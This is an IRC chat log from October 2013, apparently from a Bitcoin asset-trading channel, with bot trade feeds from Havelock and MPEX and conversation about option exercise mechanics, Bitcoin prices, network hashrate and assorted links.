BTC [-] {3} Oct 18 18:20:20 [HAVELOCK] [NEOBEE] 168 @ 0.0025 = 0.42 BTC [+] Oct 18 18:23:23 [MPEX] [S.MPOE] 6800 @ 0.00081824 = 5.564 BTC [-] {2} Oct 18 18:41:53 a whole ten shitbucks ;) Oct 18 18:47:47 [MPEX] [S.MPOE] 7100 @ 0.00081528 = 5.7885 BTC [-] Oct 18 18:54:29 yeah it's 1%. odds of winning = (1 - .010099). payout is paying as if odds were ( 1 / 1.00010102). Oct 18 18:54:54 [HAVELOCK] [B] [XBOND] 100 @ 0.00120001 = 0.12 BTC [-] Oct 18 18:55:01 ;;calc (1 - 0.010099) - ( 1 / 1.00010102) Oct 18 18:55:01 -0.00999799020401 Oct 18 18:55:16 1% all day Oct 18 18:55:55 [HAVELOCK] [B] [XBOND] 100 @ 0.00120001 = 0.12 BTC [-] Oct 18 18:58:58 [HAVELOCK] [B] [XBOND] 1523 @ 0.00118303 = 1.8018 BTC [-] {7} Oct 18 19:10:09 [MPEX] [S.MPOE] 3400 @ 0.00081636 = 2.7756 BTC [+] Oct 18 19:15:28 ;;bc,conver eur Oct 18 19:15:29 Error: "bc,conver" is not a valid command. Oct 18 19:15:30 ;;bc,convert eur Oct 18 19:15:30 1 BTC = 163.80100 U.S. dollars = 119.632632 Euros Oct 18 19:17:16 [HAVELOCK] [AM100] 75 @ 0.00515 = 0.3863 BTC [-] Oct 18 19:20:19 [HAVELOCK] [AM1] 1 @ 0.6195 BTC [+] Oct 18 19:26:25 [MPEX] [S.MPOE] 3729 @ 0.00082041 = 3.0593 BTC [+] {2} Oct 18 19:27:26 [MPEX] [S.MPOE] 8471 @ 0.00082151 = 6.959 BTC [+] {4} Oct 18 19:58:57 [MPEX] [S.MPOE] 4218 @ 0.00082469 = 3.4785 BTC [+] Oct 18 20:31:29 [MPEX] [S.MPOE] 582 @ 0.0008249 = 0.4801 BTC [+] Oct 18 20:43:54 https://www.schneier.com/blog/archives/2013/10/d-link_router_b.html Oct 18 20:43:55 Schneier on Security: D-Link Router Backdoor Oct 18 20:45:38 speaking of contact poison. Oct 18 20:50:16 related: http://esr.ibiblio.org/?p=4441 Oct 18 20:53:01 nice Oct 18 20:53:15 http://www.codinghorror.com/blog/2013/10/you-dont-need-millions-of-dollars.html Oct 18 20:53:16 Coding Horror: You Don't Need Millions of Dollars Oct 18 20:55:22 but some millions can't hurt anyway... Oct 18 20:55:54 [HAVELOCK] [AM100] 372 @ 0.00516509 = 1.9214 BTC [+] Oct 18 20:55:58 actually overfunded projects have a tendency to turn into shit Oct 18 20:57:36 http://www.geekosystem.com/kickstarter-board-game-failure/ Oct 18 20:57:56 [HAVELOCK] [VTX] 1 @ 0.367 BTC [+] Oct 18 20:59:34 Is there a statistic, how many underfunded projects fail? Oct 18 21:01:20 there are many great movies that were on a very tight budget, or examples of sequels with way bigger budgets that were crap Oct 18 21:02:15 but sequels suck irrelevant of budget usually Oct 18 21:02:32 well, several years of 80-hours work week *are* worth millions Oct 18 21:03:27 depends, sweeping the floor? not rly Oct 18 21:04:58 ofc, i'm relating to this:"His devotion to the machine borders on fanatical; he regularly worked 80 hour weeks and he'd take "vacations" where it was just him and a computer alone in a hotel room for a whole week – just for fun, to relax." Oct 18 21:13:11 [MPEX] [S.MPOE] 5000 @ 0.00081848 = 4.0924 BTC [-] Oct 18 21:17:11 hey jurov Oct 18 21:17:13 pm plz Oct 18 21:24:21 [HAVELOCK] [DEALCO] 80 @ 0.00699989 = 0.56 BTC [-] {2} Oct 18 21:24:22 [HAVELOCK] [CFIG] 1 @ 0.144 BTC [+] Oct 18 21:24:23 [HAVELOCK] [VTX] 1 @ 0.367 BTC [+] Oct 18 21:25:22 [HAVELOCK] [CFIG] 1 @ 0.144 BTC [+] Oct 18 21:28:25 [HAVELOCK] [LABCO] 170 @ 0.0006 = 0.102 BTC [-] Oct 18 21:29:26 [HAVELOCK] [HIM] 4 @ 0.069 = 0.276 BTC [+] {2} Oct 18 21:30:27 [HAVELOCK] [AM1] 1 @ 0.61 BTC [-] Oct 18 21:44:24 ThickAsThieves: are you in trouble? Oct 18 21:44:41 [HAVELOCK] [LABCO] 317 @ 0.00057781 = 0.1832 BTC [-] {4} Oct 18 21:54:31 dexX7: no, normal stuff Oct 18 21:54:59 thanks! :) Oct 18 21:55:53 [MPEX] [S.MPOE] 1990 @ 0.00081962 = 1.631 BTC [+] {2} Oct 18 21:58:56 [MPEX] [S.MPOE] 2400 @ 0.00081832 = 1.964 BTC [-] Oct 18 22:08:56 looks like baidu jumped on bitcoin Oct 18 22:10:07 [HAVELOCK] [LABCO] 500 @ 0.0005777 = 0.2889 BTC [-] Oct 18 22:13:10 [HAVELOCK] [LABCO] 205 @ 0.00057031 = 0.1169 BTC [-] {4} Oct 18 22:17:14 [MPEX] [S.MPOE] 4650 @ 0.00081832 = 3.8052 BTC [-] Oct 18 22:24:21 [MPEX] [S.MPOE] 4396 @ 0.00082109 = 3.6095 BTC [+] {2} Oct 18 22:30:27 [HAVELOCK] [LABCO] 300 @ 0.0005005 = 0.1502 BTC [-] Oct 18 23:01:57 [MPEX] [S.MPOE] 3582 @ 0.00082142 = 2.9423 BTC [+] Oct 18 23:22:18 [MPEX] [S.MPOE] 14043 @ 0.00082527 = 11.5893 BTC [+] {2} Oct 18 23:26:55 ;;nethash Oct 18 23:26:55 2421134.87775 Oct 18 23:27:13 you'd think with all that power my tx would be confirmed by now. Oct 18 23:28:24 [HAVELOCK] [CBTC] 6203 @ 0.00017994 = 1.1162 BTC [-] {2} Oct 18 23:31:15 Hashing power doesn't speed up confirms. Oct 18 23:31:23 So... no Oct 18 23:31:27 well, for a couple weeks it does Oct 18 23:31:38 Less than 2 weeks usually. Oct 18 23:32:18 ;;bc,stats Oct 18 23:32:21 Current Blocks: 264500 | Current Difficulty: 2.677312494824211E8 | Next Difficulty At Block: 266111 | Next Difficulty In: 1611 blocks | Next Difficulty In About: 1 week, 1 day, 21 hours, 36 minutes, and 47 seconds | Next Difficulty Estimate: 322895975.073 | Estimated Percent Change: 20.60452 Oct 18 23:32:27 20% already! Oct 18 23:32:28 [MPEX] [S.MPOE] 4650 @ 0.00083149 = 3.8664 BTC [+] Oct 18 23:35:53 gox has a new 6 month high! Oct 18 23:37:02 SELL SELL SELL Oct 18 23:37:13 6 month high... Oct 18 23:37:27 ... nah Oct 18 23:38:22 end of april was 166.43 Oct 18 23:49:45 [MPEX] [S.MPOE] 7799 @ 0.000839 = 6.5434 BTC [+] Oct 18 23:54:50 [MPEX] [S.MPOE] 166 @ 0.000839 = 0.1393 BTC [+] Oct 19 00:03:59 [HAVELOCK] [CBTC] 1110 @ 0.00017994 = 0.1997 BTC [-] Oct 19 00:24:20 [HAVELOCK] [AM100] 35 @ 0.0053 = 0.1855 BTC [-] Oct 19 00:26:21 [HAVELOCK] [B] [XBOND] 215 @ 0.00121669 = 0.2616 BTC [-] {2} Oct 19 00:26:22 [HAVELOCK] [AM1] 1 @ 0.628 BTC [+] Oct 19 00:26:23 [HAVELOCK] [NEOBEE] 100 @ 0.0025 = 0.25 BTC [+] Oct 19 00:37:32 [MPEX] [S.MPOE] 1000 @ 0.00089085 = 0.8909 BTC [+] Oct 19 00:41:51 mircea_popescu: you around? got a question about option assignment. Oct 19 00:46:41 [MPEX] [S.MPOE] 725 @ 0.0009 = 0.6525 BTC [+] Oct 19 01:01:56 [HAVELOCK] [AM100] 35 @ 0.0054 = 0.189 BTC [+] Oct 19 01:14:13 mike_c just ask, there are more people with mpoe experience Oct 19 01:24:36 http://www.reddit.com/r/Bitcoin/comments/1oqdoo/vault_of_satoshi_new_north_american_exchange_is/ Oct 19 01:24:36 Vault of Satoshi: New `North` American Exchange is finally open Gold... Everywhere! : Bitcoin Oct 19 01:24:47 "We've ditched the "Toronto Exchange" and totally went Global" Oct 19 01:24:52 totally Oct 19 01:26:07 first exchange with golden showers Oct 19 01:26:32 inb4 mircea_popescu: mpex was first Oct 19 01:29:24 [MPEX] [S.MPOE] 1500 @ 0.00089085 = 1.3363 BTC [-] Oct 19 01:29:36 jurov: ok. it says on the faq that options will be assigned proportionally based on how many contracts you have created. Oct 19 01:29:50 not how many you've created & sold. Oct 19 01:30:03 that feels.. open to manipulation. Oct 19 01:30:20 *exercises* will be assigned Oct 19 01:30:22 very :\ Oct 19 01:30:30 right Oct 19 01:30:42 so, jurov creates 10 contracts Oct 19 01:30:55 for ITM calls. Oct 19 01:31:06 then mike_c creates 10 contracts and immediately excercises. Oct 19 01:31:19 5 assigned to you and 5 to me? free money? Oct 19 01:31:29 no Oct 19 01:31:48 well i would hope not, but i'm not seeing it Oct 19 01:31:48 vault of satoshi.. verified and secured by godaddy.. Oct 19 01:32:02 after you mkopt or split, you'll see in STAT an entry that you provided a collateral Oct 19 01:32:04 not touching that site Oct 19 01:32:47 the record stays the same regardless what you do with the options Oct 19 01:33:23 in the end of month, all exercises are put together and subtracted from all provided collateral Oct 19 01:33:57 and rest returned.. and *this* is what get assigned to you Oct 19 01:34:32 right, that seems to be the problem. sorry if i'm being slow here. i'll provide better example: Oct 19 01:34:54 so I pay for 10 exercises , you pay for 10 exercises and we both will get remaining part of our collaterals Oct 19 01:35:06 no matter what trades happened between Oct 19 01:36:27 wait. these are american options, right? excercise any time? Oct 19 01:36:53 yes, but books are made only in the end of month Oct 19 01:37:32 [HAVELOCK] [DEALCO] 75 @ 0.00699989 = 0.525 BTC [-] {2} Oct 19 01:37:37 ok.. let me pastebin an example here and hopefully you can tell me why i'm not getting free money. Oct 19 01:37:47 and thanks for the assistance. Oct 19 01:38:05 well, it's kinda my business :) Oct 19 01:40:45 then mike_c creates 10 contracts and immediately excercises <<< you forget here that you have to put *more* than this into escrow Oct 19 01:41:09 and in the month you will get assigned your part of *all* exercises, so no free money Oct 19 01:41:39 *in the end of thwe month Oct 19 01:45:40 [HAVELOCK] [AM1] 1 @ 0.625 BTC [-] Oct 19 01:46:38 ok.. so you are saying that excercising is no different from creating and immediately selling for just intrinsic value. Oct 19 01:47:56 as opposed to what? Oct 19 01:48:24 creating 10 contracts + excercise = create 10 contracts and immediately sell to market bot which buys for intrinsic value only Oct 19 01:48:56 say yes and i think i'll understand. Oct 19 01:49:09 yes it is the same, if anyone bought for this value. market bot usually buys for considerably less. Oct 19 01:49:56 ok. bit different than what i'm used to. so when you make the option, you are on the hook for the rest of the month, and there is no way to get out of that obligation Oct 19 01:50:05 i.e.: no way to get out of the trade Oct 19 01:50:26 true Oct 19 01:50:33 got it. thanks again. Oct 19 01:50:42 even if it is your job :) Oct 19 01:52:36 :) Oct 19 01:52:45 excellent, agreed. except you can't mkopt :) Oct 19 01:54:02 i can, you just have to ask here or by email Oct 19 01:55:11 after creation you can trade/exercise them online without problem Oct 19 01:55:31 yeah, but you are supposed to be the user-friendly mpex Oct 19 01:55:39 shouldn't i be able to do that on the site? Oct 19 01:56:00 er, to be clear, you ARE the user-friendly mpex. Oct 19 01:56:06 but not for MKOPT Oct 19 01:57:31 yes, you should be able. but mpex interface scares me and there wasn't much demand, so it's not ready yet Oct 19 01:57:37 hehe Oct 19 01:58:11 i think that demand will follow user-friendly tools. Oct 19 02:00:15 once you solve a problem, a demand to find a solution to that problem can only go down Oct 19 02:01:40 i would say that the demand is already exhibited in volume at the other exchanges that are easier to use Oct 19 02:01:54 and that demand could be redirected to mpex (through coinbr) Oct 19 02:02:06 which exchanges is that exactly? Oct 19 02:02:46 havelock, bitfunder. but this is the part where you say they don't have any volume? Oct 19 02:04:52 whats scary about the interface? Oct 19 02:05:05 i think its the lack of css Oct 19 02:05:33 hey, you obviously agree. bitbet doesn't look like mpex for a reason. Oct 19 02:05:47 b/c it's aimed at "consumers" Oct 19 02:05:52 mod6 i mean the interface from programmer's view Oct 19 02:05:56 sarcasm doesnt translate well over irc Oct 19 02:06:54 mike_c not that far apart either :) Oct 19 02:08:36 sarcasm doesnt translate well over irc // oh it des Oct 19 02:08:38 *does Oct 19 02:08:43 i don't agree with you.. demand does not have to exist before the product. Oct 19 02:08:49 the product can create demand. Oct 19 02:09:19 or, rather, let's say that the demand is for gambling products for BTC. Oct 19 02:09:26 and an easy-to-use option market fits the bill. Oct 19 02:09:30 ah. i felt like it was pretty easy to interface with programatically Oct 19 02:09:59 mod6 let me walk through how easy it is Oct 19 02:10:07 1. mpex happily accepts your order Oct 19 02:10:17 and done :) Oct 19 02:10:18 2. you call statjson, but no change Oct 19 02:10:37 3. next statjson, only balances change Oct 19 02:10:54 4. either your order appears or trades or both Oct 19 02:11:18 and some trades have tracking info of your order and some not Oct 19 02:11:27 no no, discrepencies are resolved in sub-second time! Oct 19 02:11:28 so they have to me matched by time/price Oct 19 02:12:17 all this happens in seconds (and when mpex had a problem, even minutes) span Oct 19 02:12:27 oh, hmm. Oct 19 02:12:43 so it's very easy for multiple orders to be mixed Oct 19 02:12:48 i've never had that issue, but i'm not managing like 6900 peoples orders either. Oct 19 02:13:00 you see Oct 19 02:13:28 actually, i think we've discussed this before. i've just forgotten. Oct 19 02:14:16 do you do lot of manual fixing? Oct 19 02:14:49 not since tracking was introduced Oct 19 02:15:04 cool Oct 19 02:15:08 [HAVELOCK] [LABCO] 2120 @ 0.00045462 = 0.9638 BTC [-] {5} Oct 19 02:15:32 while we're on the topic.. shouldn't assbot report on excercises? Oct 19 02:15:42 seems like useful information for the public at large. Oct 19 02:16:09 [HAVELOCK] [AM1] 1 @ 0.62899998 BTC [+] Oct 19 02:16:43 im almost positivley sureish it does unless sub 0.1 btc vol or something Oct 19 02:17:42 orly? since when? Oct 19 02:17:47 google doesn't seem to think so Oct 19 02:17:50 i don't think it does report exercises, although it could be hard to tell... does the CBOE or others report that information? or does it just effect open interest? Oct 19 02:17:51 https://www.google.com/search?q=site%3Alog.bitcoin-assets.com+excercise Oct 19 02:17:53 since when what Oct 19 02:18:09 well, that would be the only way to infer open interest Oct 19 02:18:18 since when assbot reports exercises Oct 19 02:18:33 afaik it did for BTC-TC only Oct 19 02:18:38 not mpex Oct 19 02:18:39 ah right Oct 19 02:18:43 you talking btc options Oct 19 02:18:48 i've personally never seen it report any exercises. Oct 19 02:19:09 mod6 it reported them as trades with strange prices Oct 19 02:19:12 well talk to mp to post it Oct 19 02:19:29 post it.. in the recent trades? Oct 19 02:19:35 like, the rss feed? Oct 19 02:19:52 post it to me and ill chan it to assbot Oct 19 02:20:04 i suppose it could be that assbot doesn't report sub .1 btc though. so that could be part of it. Oct 19 02:20:19 mod6 #bitcoin-assets-trades does not have such filter Oct 19 02:21:49 ahh. im in there, but don't watch it nearly as close as I used to. Oct 19 02:22:15 [HAVELOCK] [AM100] 100 @ 0.00546558 = 0.5466 BTC [+] {4} Oct 19 02:22:47 ok, here's where i contribute instead of nag: jurov, i believe the mpex market bot does price its orders very close to intrinsic value. Oct 19 02:22:58 http://mpex.co/?mpsic=O.USD.C140T Oct 19 02:22:58 O.USD.C140T last 200@0.14768654 Oct 19 02:23:08 ;;calc 1- (140/153.7) Oct 19 02:23:09 0.089134677944 Oct 19 02:23:26 buy price is almost exactly intrinsic value of the call Oct 19 02:23:36 mike_c, so no premium ? Oct 19 02:23:43 i believe so Oct 19 02:23:51 weird way to price options Oct 19 02:24:53 unless you're close to expiration Oct 19 02:25:15 well, not if you're a buyer and don't want to lose money :) Oct 19 02:28:42 hmmm... this means mpoe thinks it will be better off when they autoexercise Oct 19 02:28:55 interesting Oct 19 02:29:01 keeps the algorithm simple for what to do with them after buying. Oct 19 02:35:39 afaik bot does nothing special with bought options... it just calculates its exposure, prices and if it looks okay, puts orders online Oct 19 02:37:33 are you sure about that? because it seems like it would be easy for it to just have orders up at intrinsic value and just immediately excercise after buying them. Oct 19 02:39:02 since the bot is part of exchange i don't see who would profit from that Oct 19 02:39:53 nobody profits from it anyway.. Oct 19 02:40:07 if i am holding an option, it does me no good to sell it to the bot at intrinsic value Oct 19 02:40:18 i might as well just excercise Oct 19 02:40:54 perhaps it's just there so that you can check what the value is Oct 19 02:44:28 goodnight all Oct 19 02:49:43 [MPEX] [O] [O.USD.C125T] 8 @ 0.24 = 1.92 BTC [-] Oct 19 02:49:43 [MPEX] [O] [O.USD.C146T] 10 @ 0.13 = 1.3 BTC [-] Oct 19 03:02:56 [HAVELOCK] [AM100] 20 @ 0.00544499 = 0.1089 BTC [-] Oct 19 03:12:16 was that an mpex option I just saw? Oct 19 03:12:21 yup Oct 19 03:12:25 the market is heating up Oct 19 03:31:23 [MPEX] [S.MPOE] 5246 @ 0.00088523 = 4.6439 BTC [-] Oct 19 03:32:24 [HAVELOCK] [AM100] 24 @ 0.00544499 = 0.1307 BTC [-] Oct 19 03:42:35 [MPEX] [S.MPOE] 5950 @ 0.00088641 = 5.2741 BTC [+] {2} Oct 19 03:45:38 [HAVELOCK] [AM100] 204 @ 0.00550175 = 1.1224 BTC [+] {4} Oct 19 03:48:41 [HAVELOCK] [AM100] 500 @ 0.0056437 = 2.8219 BTC [+] {5} Oct 19 03:52:45 [MPEX] [O] [O.USD.P146T] 8 @ 0.01731119 = 0.1385 BTC [-] Oct 19 03:54:47 [HAVELOCK] [AM1] 1 @ 0.635 BTC [+] Oct 19 03:59:52 [HAVELOCK] [AM1] 7 @ 0.63714285 = 4.46 BTC [+] {2} Oct 19 04:09:46 https://bitcointalk.org/index.php?topic=304250.240 Oct 19 04:10:02 Now that is ghetto rigging that guy has Oct 19 04:15:33 i can't decide if that is awesome or horrible. Oct 19 04:16:08 [MPEX] [S.MPOE] 5618 @ 0.000887 = 4.9832 BTC [+] {2} Oct 19 04:18:25 A little of both Oct 19 04:23:15 [MPEX] [S.MPOE] 9000 @ 0.00088722 = 7.985 BTC [+] Oct 19 04:29:21 [HAVELOCK] [VTX] 2 @ 0.36000003 = 0.72 BTC [-] Oct 19 04:29:22 [MPEX] [S.MPOE] 3181 @ 0.00088722 = 2.8222 BTC [+] Oct 19 04:31:23 [HAVELOCK] [AM100] 53 @ 0.00565 = 0.2995 BTC [+] Oct 19 04:32:48 <_Neil> ;;nethash Oct 19 04:32:49 2505998.85313 Oct 19 04:33:00 <_Neil> http://bitbet.us/bet/530/btc-network-hashrate-will-exceed-2500-th-s-before/ Oct 19 04:33:02 <_Neil> Done Oct 19 04:33:04 BitBet - BTC network hashrate will exceed 2500 TH/s before February Oct 19 04:34:54 http://www.youtube.com/watch?v=btvSE6tVHzQ Oct 19 04:34:54 John Wayne on liberals - YouTube Oct 19 04:35:09 mike_c shoot. Oct 19 04:43:52 lol @john romero reference. Oct 19 04:44:00 didn't the guy bury ~20mn or so, in 1990 dollars ? Oct 19 04:45:17 Whatever. US' left, US' right, they're both making the same thing, more or less. One party country as far as I'm concerned. Oct 19 04:45:46 There's not much difference between democrats and republicans. Oct 19 04:46:37 i.e.: no way to get out of the trade << you can get out of it synthetically. buy the option. Oct 19 04:48:05 wait, there's options volume on teh golden showers now ? Oct 19 04:48:09 how long have i been away ? Oct 19 04:49:25 Too long apparently Oct 19 04:50:27 lol Oct 19 04:50:43 [HAVELOCK] [VTX] 17 @ 0.36000003 = 6.12 BTC [-] Oct 19 04:51:22 "UPDATE: 7:30PM (EST) -- We broke 100 up votes... the shower continues!! I am getting CARPAL TUNNEL... THANKS!!" Oct 19 04:51:35 i hope someone somewhere is keeping track of all the reddirdation. Oct 19 04:51:43 [HAVELOCK] [VTX] 1 @ 0.36000003 BTC [-] Oct 19 04:52:48 Who gets a golden shower? Oct 19 04:58:59 mircea_popescu: not sure if you saw. what do you think about posting option excercises to kako for assbot Oct 19 04:59:01 the investors, generally. Oct 19 04:59:12 midnightmagic mike_c MiningBuddy- mircea_popescu mius mixdio Oct 19 04:59:54 mike_c it's not customary to announce exercises. Oct 19 05:00:25 jurov http://nosuchlabs.com << check it out, your factorisartion dream comes true. Oct 19 05:03:54 mmm Oct 19 05:04:56 [HAVELOCK] [AM100] 56 @ 0.00544543 = 0.3049 BTC [-] {2} Oct 19 05:05:19 mircea_popescu: is that new or old, that url? Oct 19 05:05:33 Keys Processed: Oct 19 05:05:33 5 Oct 19 05:06:01 seaotter: ~5 min. old. Oct 19 05:06:41 you know, it is ok to have a and . we don't need to save 50 bytes over the wire anymore. Oct 19 05:06:50 asciilifeform: source? Oct 19 05:07:13 seaotter: source of what Oct 19 05:07:19 or that url Oct 19 05:07:32 seaotter: it's plain euclid, you can write the damn thing yourself Oct 19 05:08:13 gcd(Mn, prod(M(0)...M(n-1)) Oct 19 05:10:17 sry, i have high levle of etanol in bl00d Oct 19 05:10:27 at least Oct 19 05:10:33 seaotter: sobriety not require here. Oct 19 05:10:35 someone definitely plays on futureblock game Oct 19 05:10:43 with hashrate Oct 19 05:11:11 what is best source for hash rate value? Oct 19 05:11:16 some live charts? Oct 19 05:12:03 [HAVELOCK] [AM1] 22 @ 0.67957272 = 14.9506 BTC [+] {3} Oct 19 05:13:04 [MPEX] [S.MPOE] 6300 @ 0.00088974 = 5.6054 BTC [+] Oct 19 05:13:04 [HAVELOCK] [AM1] 17 @ 0.71417646 = 12.141 BTC [+] {4} Oct 19 05:19:10 [HAVELOCK] [NEOBEE] 2570 @ 0.002195 = 5.6412 BTC [-] {4} Oct 19 05:19:14 seaotter try bitcoin.sipa.be Oct 19 05:20:11 [HAVELOCK] [NEOBEE] 2500 @ 0.00210928 = 5.2732 BTC [-] {11} Oct 19 05:20:16 zoom is missing :/ Oct 19 05:21:12 [HAVELOCK] [AM100] 69 @ 0.00565 = 0.3899 BTC [+] Oct 19 05:22:13 [HAVELOCK] [AM100] 711 @ 0.00576789 = 4.101 BTC [+] {7} Oct 19 05:22:14 [MPEX] [S.MPOE] 7217 @ 0.00088836 = 6.4113 BTC [-] Oct 19 05:24:01 zoom is the scrollbar :) Oct 19 05:24:15 [HAVELOCK] [NEOBEE] 2500 @ 0.00199963 = 4.9991 BTC [-] {3} Oct 19 05:26:17 [HAVELOCK] [AM100] 358 @ 0.00612579 = 2.193 BTC [+] {7} Oct 19 05:33:24 [HAVELOCK] [VTX] 1 @ 0.36000003 BTC [-] Oct 19 05:39:30 [HAVELOCK] [AM100] 161 @ 0.00642968 = 1.0352 BTC [+] {2} Oct 19 05:41:32 [HAVELOCK] [AM100] 361 @ 0.00644107 = 2.3252 BTC [+] {3} Oct 19 05:50:42 [HAVELOCK] [VTX] 11 @ 0.36000003 = 3.96 BTC [-] Oct 19 05:56:21 lol 796 exchange is contacting me to add my stocks to their platform. Oct 19 05:56:22 123! Oct 19 05:56:34 796 Oct 19 05:56:35 123! Oct 19 05:56:39 146 Oct 19 05:56:54 ok, assbot reacts to 796 apparently Oct 19 05:56:55 123! Oct 19 05:58:41 Or simple as Oct 19 05:58:41 Do re mi Oct 19 05:58:41 ABC, one, two, three, baby, you and me girl! Oct 19 06:16:48 http://trilema.com/2013/snsa-rsa-public-key-factorisation-webservice/ Oct 19 06:16:49 S.NSA - RSA public key factorisation webservice pe Trilema - Un blog de Mircea Popescu. Oct 19 06:22:50 and since i dug this up, dropping it here for the ssl fanclub : http://arstechnica.com/business/2011/09/new-javascript-hacking-tool-can-intercept-paypal-other-secure-sessions/ Oct 19 06:23:13 [HAVELOCK] [B] [XBOND] 967 @ 0.00121322 = 1.1732 BTC [-] {3} Oct 19 06:24:14 [HAVELOCK] [B] [XBOND] 838 @ 0.00121857 = 1.0212 BTC [+] {3} Oct 19 06:24:15 [HAVELOCK] [AM1] 8 @ 0.71899999 = 5.752 BTC [+] {2} Oct 19 06:26:16 [MPEX] [S.MPOE] 4703 @ 0.0008911 = 4.1908 BTC [+] {2} **** BEGIN LOGGING AT Sat Oct 19 15:45:46 2013 Oct 19 15:45:51 hey Oct 19 15:46:04 ahoy. Oct 19 15:46:32 i was running out of m p sentences to summon you cap'n Oct 19 15:47:09 lol Oct 19 15:47:57 theres always a healthy dose of vitamin truth in my foolishness Oct 19 15:47:58 oy vey Oct 19 15:48:07 yey Oct 19 15:49:37 "Thanks to Adrien Chen, the whole internet knew about Silk Road" Oct 19 15:49:44 dude these media fuckwits need to get a grip. Oct 19 15:50:01 whats a chen? Oct 19 15:50:12 nobody ever heard or ever gave a shit about all their little self-famous circlejerk Oct 19 15:50:19 Vexual some gawker nobody. Oct 19 15:50:46 well whoever dpr was, he wouldna got so much money if people hadnt heard Oct 19 15:51:55 and thats why that guy got busted, coz the shit went bubblegum, and the real dpr didnt want the trouble Oct 19 15:51:56 but people didn't hear from some schmuck the other media schmucks know Oct 19 15:52:06 because people don't give a shit about gawker, and conde nast, and all the rest of it. Oct 19 15:52:30 [MPEX] [S.MPOE] 8796 @ 0.00088986 = 7.8272 BTC [-] {2} Oct 19 15:52:36 i couldnt even tell you the url for gawker Oct 19 15:53:41 i couldnt find a broken gpg key to check your checker with Oct 19 15:54:59 so check it with a not broker one Oct 19 15:55:36 eh Oct 19 15:57:45 "No explanation is necessary for why our hero can hear a ringing telephone but not the movie's soundtrack, or why the space ship is menaced by the Negative Space Wedgie, but not by the opening credits drifting by outside the ship" Oct 19 15:57:56 tvtropes might be the best website on the internets. Oct 19 15:58:49 im just thinking and i can't think of one website i need to see, what is this? Oct 19 15:59:28 do i look everyday? Oct 19 15:59:51 http://tvtropes.org/pmwiki/pmwiki.php/WesternAnimation/Animaniacs Oct 19 15:59:52 WesternAnimation/Animaniacs - Television Tropes & Idioms Oct 19 15:59:53 i see anime and skimask ads Oct 19 16:01:01 speaking of speilbeg, ive been attempting kubrik, and ive come to the conclusion that hes a bit crap Oct 19 16:02:42 good crap. comptetant Oct 19 16:03:59 id love to se what speilberg could do with 2 hours of film if he went weird Oct 19 16:10:30 http://www.youtube.com/watch?v=c-Xm4V8ihos Oct 19 16:10:31 Family Dog - K9 Terror - YouTube Oct 19 16:10:41 ;;sell 1000 Oct 19 16:10:42 (sell [at|@] []) -- Logs a sell order for units of per unit, in units of . Use the optional field to put in any special notes. may include an arithmetical expression, and {(mtgox|bitstamp)(ask|bid|last|high|low|avg)} to index price to mtgox ask, bid, last, high, low, or avg (1 more message) Oct 19 16:10:50 ;;sell 1000 @ 185 Oct 19 16:10:50 (sell [at|@] []) -- Logs a sell order for units of per unit, in units of . Use the optional field to put in any special notes. may include an arithmetical expression, and {(mtgox|bitstamp)(ask|bid|last|high|low|avg)} to index price to mtgox ask, bid, last, high, low, or avg (1 more message) Oct 19 16:11:34 ;;market sell 1000 Oct 19 16:11:36 A market order to sell 1000 bitcoins right now would net 182283.1834 USD and would take the last price down to 181.0100 USD, resulting in an average price of 182.2832 USD/BTC. | Data vintage: 0.0004 seconds Oct 19 16:11:54 ah thanks Oct 19 16:11:57 np :) Oct 19 16:12:15 just seeing what this sell order for 1000 btc or so will do Oct 19 16:12:28 not much apparently Oct 19 16:12:34 You're selling 1000BTC? Oct 19 16:13:53 da fuck 182 ?@ Oct 19 16:13:55 $avg Oct 19 16:13:55 mircea_popescu: 166.30 Oct 19 16:14:12 got hit 197 AUD tonight Oct 19 16:14:13 whoa how long have i been asleep Oct 19 16:14:21 *x Oct 19 16:14:29 idk..its tuesday. Oct 19 16:14:46 not me..i saw an order for that Oct 19 16:14:50 everyones buying bitcoin for xmas Oct 19 16:15:53 [MPEX] [S.MPOE] 8000 @ 0.00088988 = 7.119 BTC [+] {2} Oct 19 16:16:02 im gonna buy some for my landscaper Oct 19 16:16:12 is she hot? Oct 19 16:16:14 so we see 500 this year is the idea here ? Oct 19 16:16:38 300 feels limit before 14 Oct 19 16:17:58 after that, you divide 70billion by 21 million Oct 19 16:18:02 The idea is people go crazy upward, downward, sideway Oct 19 16:18:10 and prices move erratically and dramatically Oct 19 16:18:24 Namworld i would say this lift is legit. Oct 19 16:18:31 we are just that big. Oct 19 16:18:58 I should sell my casascius coins, right ? Oct 19 16:19:10 maybe next week or w/e Oct 19 16:19:41 Are you sarcastic or...? Oct 19 16:19:49 Namworld nah, straight up. Oct 19 16:20:07 all the computers Oct 19 16:20:21 As much as I believe in Bitcoin's growth, I don't believe in overnight 10-30% changes Oct 19 16:20:31 remember email? Oct 19 16:20:36 can't i just email you? Oct 19 16:20:41 nope Oct 19 16:20:45 now, yes Oct 19 16:21:40 its an unstoppable internet protocol for money Oct 19 16:21:49 deal with it Oct 19 16:21:51 Namworld well, allignment to secular implicit value will happen in spurts and bursts. Oct 19 16:22:05 looking from the other way, some such sudden moves are legit, some aren't. Oct 19 16:22:44 bitcoin has been accumulating major strengths over the past 6 months the price flatlined. an upmove isn't that big a deal really. Oct 19 16:22:57 this aint sghit Oct 19 16:23:03 consider : difficulty up 1k%, clear proof delivered that sr didn't matter for bitcoin, and that usg doesn't matter for bitcoin... Oct 19 16:23:24 Well we'll have to see. I've seen quick, wavering up and downs like the market can't make up it's mind. Oct 19 16:23:44 governments throwing in the haughty towel and getting in line to mine like anyone else... Oct 19 16:23:50 This is sell offs in BTC on MTGox/Bitstamp. Oct 19 16:23:52 we're sensibly closer to world domination today than in march. Oct 19 16:23:59 People who don't want to give into the AML/KYC. Oct 19 16:24:05 When this is done it will plummet again. Oct 19 16:24:31 Maybe. I can't really believe it yet. Oct 19 16:24:45 Namworld imo it's wealth realingning. X value btc is held by a different set of owners than 2X value btc. Oct 19 16:24:46 Although such a rising price certainly can't hurt my finances. Oct 19 16:24:56 u better check your head nam, this iz interenet business Oct 19 16:25:00 it just burns holes when kept in the wrong pockets Oct 19 16:25:12 gotta spend some for sure Oct 19 16:25:34 satoshi was very clever Oct 19 16:25:55 Well off I go, goodbye. Will have to keep updated on price movements later. Oct 19 16:26:03 [HAVELOCK] [AM1] 6 @ 0.85791665 = 5.1475 BTC [+] {2} Oct 19 16:26:04 [HAVELOCK] [AM100] 50 @ 0.00802799 = 0.4014 BTC [+] {4} Oct 19 16:27:04 [HAVELOCK] [AM100] 43 @ 0.00828999 